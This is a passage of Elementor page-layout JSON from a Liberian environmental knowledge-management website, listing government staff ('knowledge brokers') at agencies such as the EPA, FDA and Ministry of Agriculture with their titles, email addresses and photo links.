\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"91